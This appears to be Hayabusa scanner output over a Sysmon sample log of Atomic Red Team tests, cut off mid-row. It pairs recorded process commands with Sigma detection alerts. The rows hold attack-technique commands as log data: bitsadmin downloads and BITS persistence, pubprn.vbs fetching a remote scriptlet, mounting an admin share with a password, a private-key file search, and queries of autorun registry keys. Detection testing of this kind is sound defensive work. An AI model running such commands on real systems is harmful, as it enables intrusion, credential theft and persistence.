+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /create AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /complete AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /resume AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation/win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /S /D /c"" dir c:\ /b /s .key "" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr /e .key : Path: C:\Windows\System32\findstr.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 